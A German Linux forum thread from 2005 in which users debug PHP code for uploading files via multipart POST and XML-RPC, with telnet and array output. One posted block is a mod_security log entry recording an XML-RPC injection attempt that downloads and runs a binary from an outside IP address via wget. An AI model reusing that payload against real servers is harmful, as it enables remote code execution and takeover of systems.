Lieber Besucher, herzlich willkommen bei: Linux Forum Linux-Web.de. Falls dies Ihr erster Besuch auf dieser Seite ist, lesen Sie sich bitte die Hilfe durch. Dort wird Ihnen die Bedienung dieser Seite näher erläutert. Darüber hinaus sollten Sie sich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutzen Sie das Registrierungsformular, um sich zu registrieren oder informieren Sie sich ausführlich über den Registrierungsvorgang. Falls Sie sich bereits zu einem früheren Zeitpunkt registriert haben, können Sie sich hier anmelden.
Quellcode |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
(doomy@prometheus)(21413/pts/7)(12:07am:11/10/05)- (%:~)- telnet blog.pebcak.de 80 Trying 80.190.246.220... Connected to blog.pebcak.de. Escape character is '^]'. POST / HTTP/1.1 HTTP/1.1 400 Bad Request Date: Wed, 09 Nov 2005 23:08:18 GMT Server: Apache Content-Length: 331 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.<br /> </p> <hr> <address>Apache Server at <a href="mailto:support@neessen.net">80.190.246.220</a> Port 80</address> </body></html> Connection closed by foreign host. |
PHP-Quelltext |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
<?php
function PostToHost($host, $port, $path, $referer, $data_to_send)
{
$dc = 0;
$bo="-----------------------------305242850528394";
$fp = fsockopen($host, $port, $errno, $errstr);
if (!$fp) {
echo "errno: $errno \n";
echo "errstr: $errstr\n";
return $result;
}
fputs($fp, "POST $path HTTP/1.0\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Referer: $referer\n");
fputs($fp, "User-Agent: Mozilla/4.05C-SGI [en] (X11; I; IRIX 6.5 IP22)\n");
fputs($fp, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n");
fputs($fp, "Accept-Charset: iso-8859-1,*,utf-8\n");
fputs($fp, "Content-type: multipart/form-data; boundary=$bo\n");
foreach($data_to_send as $key=>$val) {
$ds =sprintf("--%s\nContent-Disposition: form-data; name="%s"\n\n%s\n", $bo, $key, $val);
$dc += strlen($ds);
$return .= $ds;
}
$dc += strlen($bo)+3;
fputs($fp, "Content-length: $dc \n");
fputs($fp, "\n");
foreach($data_to_send as $key=>$val) {
$ds =sprintf("--%s\nContent-Disposition: form-data; name="%s"\n\n%s\n", $bo, $key, $val);
fputs($fp, $ds );
$return .= $ds;
}
$ds = "--".$bo."--\n";
fputs($fp, $ds);
while(!feof($fp)) {
$res .= fread($fp, 1);
}
fclose($fp);
return $res;
}
$filename = "homer.jpg";
$handle = fopen ($filename, "r");
$contents = fread ($handle, filesize ($filename));
fclose ($handle);
$xf="Content-Type: image/jpeg\n\n".$contents;
$data["userfile"; filename="homer.jpg"] = $xf;
$x = PostToHost (
"kevin",
80,
"/test/test.php",
"http://www.google.com",
$data
);
echo "<pre>";
echo $x;
echo "</pre>";
?>
|
Quellcode |
|
1 2 3 4 5 6 7 8 9 10 11 12 |
Array ( [datei] => Array ( [name] => impressum.php [type] => [tmp_name] => C:\Programme\xampp\tmp\php73.tmp [error] => 0 [size] => 538 ) ) |
PHP-Quelltext |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
<?php
require_once 'XML/RPC.php';
function rpc($filename) {
if ($file = file_get_contents($filename)) {
// fuer Uebertragung komprimieren?
// $file = bzcompress($file, 9);
$params = array(new XML_RPC_Value($filename, 'string'), new XML_RPC_Value($file, 'base64'));
$msg = new XML_RPC_Message('fileupload', $params);
// 2debug: echo XML
// echo $msg->serialize ();
$client = new XML_RPC_Client('/xmlrpc.php', 'mein.server.de');
// HTTP Basic Auth? (empfohlen!)
// $client->setCredentials ($username, $password);
$response = $client->send($msg);
// Fehler?
if (!$response) {
return FALSE;
}
if ($response->faultCode()) {
// evtl. Fehler ausgeben ...
return FALSE;
} else {
return TRUE;
}
} else {
return FALSE;
}
}
?>
|
Quellcode |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
==8b038f53============================== Request: xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy - - [10/Nov/2005:09:54:42 +0100] "POST /xmlrpc.php HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-" Handler: application/x-httpd-php ---------------------------------------- POST /xmlrpc.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) Content-Type: text/xml Content-Length: 269 mod_security-message: Warning. Pattern match "wget\\x20" at POST_PAYLOAD 269 <?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen `;echo '_end_';exit;/*</name></value></param></params></methodCall> HTTP/1.1 404 Not Found Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 --8b038f53-- |
PHP-Quelltext |
|
1 2 3 4 |
$content = file_get_contents('homer.jpg');
$xf="Content-Type: image/jpeg\n\n".base64_encode($content);
$data["userfile"; filename="homer.jpg"] = urlencode($xf);
|
Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von »kevink« (11.11.2005, 15:29)
PHP-Quelltext |
|
1 2 3 4 |
$content = file_get_contents('info.txt');
$xf = "Content-Type: text/plain\n\n".$content;
$data["userfile"; filename="info.txt"] = $xf;
|
Quellcode |
|
1 2 |
Das ist eine reine Text Datei, kein bild, keine Exe, etc. Neue Zeile |
Quellcode |
|
1 2 3 4 |
Content-Type: text/plain Das ist eine reine Text Datei, kein bild, keine Exe, etc. Neue Zeile |
PHP-Quelltext |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
<?php
function PostToHost($host, $port, $path, $referer, $data_to_send)
{
$dc = 0;
$bo="-----------------------------305242850528394";
$fp = fsockopen($host, $port, $errno, $errstr);
if (!$fp) {
echo "errno: $errno \n";
echo "errstr: $errstr\n";
return $result;
}
fputs($fp, "POST $path HTTP/1.0\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Referer: $referer\n");
fputs($fp, "User-Agent: Mozilla/4.05C-SGI [en] (X11; I; IRIX 6.5 IP22)\n");
fputs($fp, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n");
fputs($fp, "Accept-Charset: iso-8859-1,*,utf-8\n");
fputs($fp, "Content-type: multipart/form-data; boundary=$bo\n");
foreach($data_to_send as $key=>$val) {
$ds =sprintf("--%s\nContent-Disposition: form-data; name="%s"\n%s\n", $bo, $key, $val);
$dc += strlen($ds);
}
$dc += strlen($bo)+3;
fputs($fp, "Content-length: $dc \n");
fputs($fp, "\n");
//
foreach($data_to_send as $key=>$val) {
$ds =sprintf("--%s\nContent-Disposition: form-data; name="%s"\n%s\n", $bo, $key, $val);
fputs($fp, $ds );
}
$ds = "--".$bo."--\n";
fputs($fp, $ds);
while(!feof($fp)) {
$res .= fread($fp, 1);
}
fclose($fp);
return $res;
}
$content = file_get_contents('info.txt');
$xf = "Content-Type: text/plain\n\n".$content;
$data["userfile"; filename="info.txt"] = $xf;
$x = PostToHost (
"kevin",
80,
"/imagevenue/test.php",
"http://www.google.com",
$data
);
?>
|
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »kevink« (11.11.2005, 15:59)